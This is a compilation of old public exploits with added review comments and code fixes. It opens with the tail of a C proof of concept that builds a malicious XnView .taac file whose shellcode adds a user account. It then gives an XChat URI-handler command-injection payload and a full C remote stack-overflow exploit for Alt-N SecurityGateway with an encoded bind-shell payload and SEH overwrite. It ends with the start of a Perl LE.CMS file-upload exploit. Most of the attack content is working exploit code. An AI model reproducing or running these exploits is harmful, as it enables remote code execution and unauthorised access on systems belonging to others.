/* Filler strings, populated in main(); sized for a terminating NUL. Being globals, they are
 * zero-initialised, so any unfilled tail is already NUL. */
unsigned char nops1[257]; //256 * \x90
unsigned char nops2[21]; //20 * \x90

/* Entry point of the XnView .taac PoC: writes "sploit.taac" whose "format=" value is
 * oversized (filler, a per-service-pack return address, more filler, then the payload),
 * matching the boundary error described in the header comment. argv[1] selects the return
 * address: 0 = XP SP2, 1 = XP SP3; anything else prints usage. */
int main(int argc, char **argv)
{
int i;
FILE* f;
printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n");
printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n");
printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n");
if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
printf("Usage: %s target\n",argv[0]);
printf("Where target is:\n");
printf("0: WinXP SP2\n");
printf("1: WinXP SP3\n");
printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n");
return EXIT_SUCCESS;
}
/* Build the NUL-terminated filler strings that are later emitted through %s. */
for(i=0;i<256;i++) nops1[i]='\x90';
nops1[256]='\0';
/* NOTE(review): the loop bound (14) disagrees with the declaration's "20 * \x90" comment;
 * since nops2 is a zero-initialised global, %s stops after 14 bytes. */
for(i=0;i<14;i++) nops2[i]='\x90';
nops2[20]='\0';
/* NOTE(review): fopen() result is never checked, so a failure crashes in fprintf(). The two
 * branches are identical apart from the return-address array. */
if(atoi(argv[1])==0) {
f=fopen("sploit.taac","wb");
/* TAAC header fields; '\xa' (newline) is passed for each %c. */
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa');
}else{
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa');
}
fclose(f);
printf("sploit.taac created!\n");
printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n");
printf("Then check with \"net user\" or from control panel for the user account test.\n");
return EXIT_SUCCESS;
}

muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit

###################################
#muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit
###################################







XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)

###################################
#XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)
###################################

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approach is a bit different.
# We don't use any % or ../../../ as the other related bugs do, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like these you can talk about individual freedom, you're probably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.





Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit

###################################
#Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit
###################################

/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtaining the overflow and crashing the application is a piece of cake.
* Making working code execution here is hell. First we can see that
* the username, before overflowing the buffer, passes through some functions
* that change and restrict some useful chars. Firstly the buffer gets
* lowercased, so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After a few days of work I came up with the required bindshell, which bypasses
* all restricted chars and executes. Thx to skylined for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")


// Forward declarations. Of these, only construct_shellcode() and construct_buffer() are
// defined within this listing; usage()/logo()/end_logo(), the hr2_* socket helpers, execute()
// and extract_ip_and_port() are defined outside the visible part. struct h2readyp is
// referenced but never defined in view.
void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

// Pointer + length pair used for both the raw payload and the assembled HTTP request.
struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);




// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
// Bundled getopt() (XGetopt) -- declaration only, the definition is not in this listing.
// The globals mirror the POSIX names; optind starts at 0 here.
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------

// Payload table, NULL-terminated. The single entry is the author's re-encoded bind shell
// (length 743 as given); the embedded comments describe the original Metasploit payload and
// the custom encoder used to avoid the bad characters listed in the file header. Kept as provided.
struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{"Bindshell, port 9998", 743,
/* The non-encoded metasploit payload
* windows/shell_bind_tcp - 317 bytes
* http://www.metasploit.com
* Encoder: generic/none
*/
/*
* Encoder: heretic2's nonupper. with help of skylined tool.
*/
"\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66"
"\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83"
"\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9"
"\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74"
"\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30"
"\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62"
"\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a"
"\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c"
"\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73"
"\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c"
"\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c"
"\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69"
"\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a"
"\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c"
"\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70"
"\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c"
"\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79"
"\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c"
"\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73"
"\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35"
"\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34"
"\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a"
"\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a"
"\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35"
"\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66"
"\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71"
"\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71"
"\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f"
"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64"
"\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76"
"\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78"
"\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e"
"\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72"
"\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71"
"\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75"
"\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68"
"\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f"
"\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36"
"\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63"
"\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b"
"\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72"
"\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75"
"\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73"
"\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b"
"\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38"
"\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e"
"\x36\x6b\x6f\x68\x70\x61\x61"
},
{NULL, 0, NULL}
};




// Target table: description plus the address written over the SEH handler record in
// construct_buffer(). The second entry is a deliberately invalid address for crash/debug runs.
// The table is NULL-terminated, but main() does not validate the -t index against it.
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret
{"DOS/Crash/Debug/Test/Fun", 0x61616161 },
{NULL, 0x00000000 }
};

// memory for buffers
// Fixed-size scratch buffers for the payload and the assembled request, zeroed in main().
// dwTimeout is settable via -T; neither it nor 'timeout' is read anywhere in this listing.
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;


// Entry point. Parses -h host[:port], -t target (1-based) and -T timeout, builds the payload
// and the HTTP request buffer, then hands the buffer to execute() (declared above, defined
// outside this listing).
// NOTE(review): getopt() returns int; storing it in 'char c' and comparing with EOF only works
// where char is signed. 'R:' is in the optstring but has no case, so -R falls through to
// usage(). -t is not range-checked against targets[], the port from sscanf() is not
// validated, and WSAStartup()'s return value is ignored.
int main(int argc, char **argv)
{
char c,*remotehost=NULL,temp1[100];
int sh,port=4000,itarget=0;
struct _buf fshellcode, sbuffer;

logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}

WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------

while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
// -h host or host:port; the ':' is overwritten in place to split the string.
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='\0';
}
break;
// -t is 1-based on the command line; converted to a 0-based index into targets[].
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
// -T sets dwTimeout, which nothing in this listing reads.
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}

if(remotehost == NULL)
{
printf(" [-] Please enter remotehost\n");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);
// The bind port is fixed by the payload; 9998 is only echoed here.
sprintf(temp1, "%d", 9998);
print_info_banner_line("BINDPort", temp1);

printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);


// Both _buf descriptors point at the zeroed global scratch buffers.
memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;

memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;

if(!construct_shellcode(sh, &fshellcode, itarget))
{
end_logo();
WSACleanup();
return -1;
}

printf(" [+] Payload constructed\n");

if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf(" [-] Buffer not constructed\n");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Final buffer constructed\n");


if(!execute(&sbuffer, remotehost, port))
{
printf(" [-] Buffer not sent\n");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sent\n");

end_logo();
WSACleanup();
return 0;
}

int construct_shellcode(int sh, struct _buf * shf, int target)
{
    /* Copies shellcodes[sh] into the caller's buffer and records its length.
     * The payload does not depend on the target, so that argument is unused.
     * Always returns 1; there is no check that shf->ptr can hold the payload
     * (main() passes the 10000-byte payloadbuffer). */
    (void)target;
    shf->size = shellcodes[sh].length;
    memcpy(shf->ptr, shellcodes[sh].shellcode, shf->size);
    return 1;
}



/* Request skeleton.  templ1 is the HTTP/1.0 POST header for
 * /SecurityGateway.dll; its %d is filled with the body length.  templ2 is the
 * login form body; its %s receives the percent-encoded overflow string as the
 * "username" field, the remaining fields are constant. */
char templ1[] = "POST /SecurityGateway.dll HTTP/1.0\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
"Accept-Language: ru\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
"Content-Length: %d\r\n\r\n";
char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In";

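int encode_uri(char * in, int len, char * out, int *outlen)
{
    /* Percent-encodes every one of the len bytes of in ("%xx", lowercase hex,
     * always two digits) into out and stores the encoded length in *outlen.
     * The loop header was mangled in the listing ("for(i=0;i {") and is
     * restored here.
     *
     * On entry *outlen is only the number of bytes that are zeroed first; it
     * is NOT enforced as a capacity.  out must hold at least 3*len+1 bytes
     * (the final sprintf writes a terminating NUL).  The single caller,
     * construct_buffer(), uses a 10000-byte buffer for a ~6 KB result.
     * Always returns 0. */
    char *start = out;
    int i;

    memset(out, 0, *outlen);
    for (i = 0; i < len; i++)
    {
        *out++ = '%';
        sprintf(out, "%.2x", (unsigned char)in[i]);   /* exactly two hex digits + NUL */
        out += 2;
    }
    *outlen = (int)(out - start);
    return 0;
}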



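int construct_buffer(struct _buf * shf, int target, struct _buf * abuf)
{
    /* Builds the HTTP request into abuf: 476 filler bytes, a short jump over
     * the SEH record, the target's pop/pop/ret address as the overwritten
     * handler, a NOP sled carrying the shellcode - all percent-encoded into
     * the "username" field of templ2 and wrapped in the templ1 header with a
     * matching Content-Length.  Returns 1 on success, 0 for an invalid
     * target index. */
    unsigned char * cp;
    char *lp;
    char buf[10000], buf2[10000], rstr1[10000], rstr2[10000];
    int olen, ntargets;

    /* targets[] is NULL-terminated; an out-of-range index (e.g. -t 0 -> -1)
     * previously read the SEH address from outside the array. */
    for (ntargets = 0; targets[ntargets].t != NULL; ntargets++)
        ;
    if (target < 0 || target >= ntargets)
        return 0;

    cp = abuf->ptr;

    memset(buf, 0, sizeof(buf));
    memset(buf2, 0, sizeof(buf2));
    memset(rstr1, 0, sizeof(rstr1));
    memset(rstr2, 0, sizeof(rstr2));

    lp = buf;

    // overflow: filler up to the SEH record
    memset(lp, '\x61', 476);
    lp += 476;

    // jmp over seh: NOP NOP JMP +4 (lands just after the handler address)
    *lp++ = '\x90';
    *lp++ = '\x90';
    *lp++ = '\xeb';
    *lp++ = '\x04';

    // replace SEH handler with the target's address, little-endian
    *lp++ = (char)((targets[target].ret      ) & 0xff);
    *lp++ = (char)((targets[target].ret >>  8) & 0xff);
    *lp++ = (char)((targets[target].ret >> 16) & 0xff);
    *lp++ = (char)((targets[target].ret >> 24) & 0xff);

    // 1500-byte NOP sled; the shellcode is dropped 5 bytes into it
    memset(lp, '\x90', 1500);
    lp += 5;

    memcpy(lp, shf->ptr, shf->size);
    lp += shf->size;

    /* NOTE: the payload length is taken with strlen(), so a NUL byte anywhere
     * in it (for instance inside a target's ret address) silently truncates
     * the request at that point. */
    olen = (int)sizeof(buf2);   /* true capacity; the old value 1500 was only the pre-zeroed prefix */
    encode_uri(buf, (int)strlen(buf), buf2, &olen);
    sprintf(rstr2, templ2, buf2);
    sprintf(rstr1, templ1, (int)strlen(rstr2));   /* %d expects an int */

    strcat((char*)cp, rstr1);
    strcat((char*)cp, rstr2);

    cp += strlen((char*)cp);
    abuf->size = (int)(cp - abuf->ptr);
    return 1;
}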


void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
    /* Splits "host[:port]" in place: remotehost is pointed at str and, when a
     * ':' is present, *port is parsed from the text after it and the ':' is
     * overwritten with NUL.  Without a ':' *port is left untouched; a
     * non-numeric port also leaves it untouched (sscanf result unchecked).
     * Not called from main(), which carries a copy of this logic. */
    char *colon = strchr(str, ':');

    remotehost = str;
    if (colon != NULL)
    {
        sscanf(colon + 1, "%d", port);
        *colon = '\0';
    }
}



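int hr2_connect(char * remotehost, int port, int timeout)
{
    /* Resolves remotehost, opens a non-blocking TCP connection to port and
     * waits up to timeout ms (INFINITE = forever) for it to complete.
     * Returns the socket (as int) on success, 0 on timeout, SOCKET_ERROR on
     * resolution / socket / connect failure.  The socket stays non-blocking.
     * Fixes vs. the original: tv_usec is microseconds (the ms remainder was
     * stored unscaled), socket() failure is INVALID_SOCKET, the socket is
     * closed on timeout/error instead of leaked, and a refused connection is
     * reported as a failure rather than waiting out the whole timeout. */
    SOCKET s;
    struct hostent *host;
    struct sockaddr_in addr;
    TIMEVAL stTime;
    TIMEVAL *pstTime = NULL;
    fd_set wr, ex;
    int res;
    unsigned long nonblock = 1;

    if (INFINITE != timeout)
    {
        stTime.tv_sec = timeout / 1000;
        stTime.tv_usec = (timeout % 1000) * 1000;
        pstTime = &stTime;
    }

    host = gethostbyname(remotehost);
    if (!host) return SOCKET_ERROR;

    memset(&addr, 0, sizeof(addr));
    addr.sin_addr = *(struct in_addr*)host->h_addr;
    addr.sin_port = htons((unsigned short)port);
    addr.sin_family = AF_INET;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET)
        return SOCKET_ERROR;

    ioctlsocket(s, FIONBIO, &nonblock);

    /* non-blocking connect returns immediately (WSAEWOULDBLOCK); completion
     * shows up as writability, failure in the exception set on Winsock */
    connect(s, (struct sockaddr*)&addr, sizeof(addr));

    FD_ZERO(&wr);
    FD_SET(s, &wr);
    FD_ZERO(&ex);
    FD_SET(s, &ex);

    res = select(0, NULL, &wr, &ex, pstTime);   /* first argument is ignored by Winsock */
    if (res < 0)
    {
        closesocket(s);
        return SOCKET_ERROR;
    }
    if (res == 0)
    {
        closesocket(s);
        return 0;
    }
    if (FD_ISSET(s, &ex))
    {
        closesocket(s);
        return SOCKET_ERROR;
    }
    return (int)s;   /* NOTE: truncates a 64-bit SOCKET handle; callers compare it with 0 / SOCKET_ERROR */
}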


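int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
    /* Sends all len bytes of buf, looping over partial send()s (the socket is
     * left non-blocking by hr2_connect(), so a single send() may be short).
     * Returns the number of bytes sent, or SOCKET_ERROR if nothing could be
     * sent.  timeout is accepted for symmetry with hr2_tcprecv() but not
     * honoured, as before. */
    unsigned int total = 0;
    (void)timeout;

    while (total < len)
    {
        int n = send(s, (char *)buf + total, (int)(len - total), 0);
        if (n == SOCKET_ERROR)
            return total ? (int)total : SOCKET_ERROR;
        if (n == 0)
            break;
        total += (unsigned int)n;
    }
    return (int)total;
}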

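int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
    /* Waits up to timeout ms (INFINITE = forever, 0 = a single poll) for s to
     * become readable, then does one recv() of at most len bytes.
     * Returns recv()'s result, 0 on timeout, -1 on a select() error.
     * NOTE: a timeout and a peer close (recv() == 0) are indistinguishable.
     * Fix vs. the original: tv_usec is microseconds, the ms remainder was
     * stored unscaled. */
    TIMEVAL stTime;
    TIMEVAL *pstTime = NULL;
    fd_set xy;
    int res;

    if (INFINITE != timeout)
    {
        stTime.tv_sec = timeout / 1000;
        stTime.tv_usec = (timeout % 1000) * 1000;
        pstTime = &stTime;
    }
    FD_ZERO(&xy);
    FD_SET(s, &xy);

    res = select(0, &xy, NULL, NULL, pstTime);   /* first argument is ignored by Winsock */

    if (res == 0) return 0;
    if (res < 0) return -1;

    return recv(s, (char *)buf, len, 0);
}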

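int execute(struct _buf * abuf, char * remotehost, int port)
{
    /* Connects to remotehost:port, sends the constructed request and polls
     * once for a reply (which is discarded).  Returns 1 when the buffer was
     * sent, 0 on connect or send failure (main() prints the failure).
     * Fixes vs. the original: the -T timeout (dwTimeout, default 5000 ms) is
     * honoured instead of a hard-coded 10000, and a failed send() is
     * reported instead of printing "Sent -1 out of N" and returning 1. */
    int x;
    SOCKET s;
    char RECVB[10000];

    s = hr2_connect(remotehost, port, (int)dwTimeout);
    if (s == 0)
    {
        printf(" [-] connect() timeout\n");
        return 0;
    }
    if (s == SOCKET_ERROR)
    {
        printf(" [-] Connection failed\n");
        return 0;
    }
    x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
    if (x == SOCKET_ERROR)
    {
        printf(" [-] send() failed\n");
        closesocket(s);
        return 0;
    }
    printf(" [+] Sent %d out of %d bytes\n", x, abuf->size);

    /* timeout 0 = one non-blocking poll; the response is not inspected */
    x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0);

    closesocket(s);
    return 1;
}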

// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
    /* Minimal getopt() (XGetopt).  Returns the next option letter, EOF when
     * the options are exhausted (first non-option argument, a lone "-", or
     * "--"), and '?' for an unknown letter or a missing argument.  Letters
     * followed by ':' in optstring take an argument, either attached
     * ("-h10.0.0.1") or as the next argv element.  State lives in the globals
     * optind / optarg (declared elsewhere in this file) and the static below. */
    static char *next = NULL;         /* position inside a clustered element such as "-ab" */
    if (optind == 0)
        next = NULL;                  /* optind == 0 restarts the scan */

    optarg = NULL;

    if (next == NULL || *next == '\0')
    {
        if (optind == 0)
            optind++;                 /* skip argv[0] */

        /* end of options: argv exhausted, or an element that is not "-x" */
        if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
        {
            optarg = NULL;
            if (optind < argc)
                optarg = argv[optind];   /* the terminating non-option is handed back in optarg */
            return EOF;
        }

        if (strcmp(argv[optind], "--") == 0)
        {
            optind++;
            optarg = NULL;
            if (optind < argc)
                optarg = argv[optind];
            return EOF;
        }

        next = argv[optind];
        next++; // skip past -
        optind++;
    }

    char c = *next++;
    char *cp = strchr(optstring, c);

    if (cp == NULL || c == ':')       /* unknown letter; ':' itself is never an option */
        return '?';

    cp++;
    if (*cp == ':')                   /* this option takes an argument */
    {
        if (*next != '\0')
        {
            optarg = next;            /* attached form: "-h10.0.0.1" */
            next = NULL;
        }
        else if (optind < argc)
        {
            optarg = argv[optind];    /* separate form: "-h 10.0.0.1" */
            optind++;
        }
        else
        {
            return '?';               /* argument required but argv is exhausted */
        }
    }

    return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------

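void print_info_banner_line(const char * key, const char * val)
{
    /* Prints one " # key     : value      # " banner row: the key is padded to
     * 8 columns and the value to 57.  The original computed the padding as
     * 58 - strlen(val) - 1 (and 8 - strlen(key)) in size_t arithmetic, which
     * wraps to a huge count - and a memset() past the 100-byte stack buffers -
     * as soon as the value is 57+ characters (e.g. a long -h argument).  The
     * padding is now clamped at zero and never exceeds the buffers. */
    char temp1[100], temp2[100];
    size_t vlen = strlen(val), klen = strlen(key);
    size_t vpad = vlen < 57 ? 57 - vlen : 0;
    size_t kpad = klen < 8 ? 8 - klen : 0;

    memset(temp1, 0, sizeof(temp1));
    memset(temp1, '\x20', vpad);      /* vpad <= 57 < sizeof(temp1) */

    memset(temp2, 0, sizeof(temp2));
    memset(temp2, '\x20', kpad);      /* kpad <= 8 */
    printf(" # %s%s: %s%s# \n", key, temp2, val, temp1);
}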



void usage(char * s)
{
    /* Prints the command-line help followed by the numbered target and
     * payload lists (1-based, matching the -t argument) and the closing
     * banner.  The argument placeholders after -h / -t in the usage line look
     * as if they were stripped by the HTML listing. */
    int idx;

    printf("\n"
           " Usage: %s -h -t \n"
           " -------------------------------------------------------------------\n"
           " Arguments:\n"
           " -h ........ host to attack, default port: 4000\n"
           " -t ........ target to use\n"
           " -T ........ socket timeout\n"
           "\n"
           " Supported SecurityGateway versions:\n", s);
    for (idx = 0; targets[idx].t != 0; ++idx)
        printf(" %d. %s\n", idx + 1, targets[idx].t);

    printf("\n"
           " Code execution:\n");
    for (idx = 0; shellcodes[idx].name != 0; ++idx)
        printf(" %d. %s\n", idx + 1, shellcodes[idx].name);

    end_logo();
}

void logo()
{
    /* Opening banner (ASCII art, exploit title, author, affected versions).
     * The text contains no format specifiers, so it is written as one
     * literal with fputs(). */
    fputs("\n\n"
          " ####################################################################### \n"
          " # ____ __ _ ______ __ _____ #\n"
          " # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"
          " # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"
          " # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"
          " # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"
          " # crew #\n"
          " ####################################################################### \n"
          " # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # \n"
          " # Solution: Update to 1.02 version # \n"
          " # Author : Heretic2 < heretic2x [at] gmail.com > # \n"
          " # Version : 1.0 # \n"
          " # System : Windows ALL # \n"
          " # Date : 11.06.2008 - 14.06.2008 # \n"
          " # ------------------------------------------------------------------- # \n",
          stdout);
}

void end_logo()
{
    /* Closing banner, printed on every exit path of main() and by usage(). */
    fputs(" # ------------------------------------------------------------------- # \n"
          " # Dreatica-FXP crew [Heretic2] # \n"
          " ####################################################################### \n\n",
          stdout);
}

LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit

###################################
# LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit
###################################

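#!/usr/bin/perl
# LE.CMS <= 1.4 arbitrary file upload.
#
# POSTs a local file to /cms/admin/upload.php with the form fields that the
# upload script treats as "already authenticated" (see the inline notes), then
# prints where the file should have landed.
#
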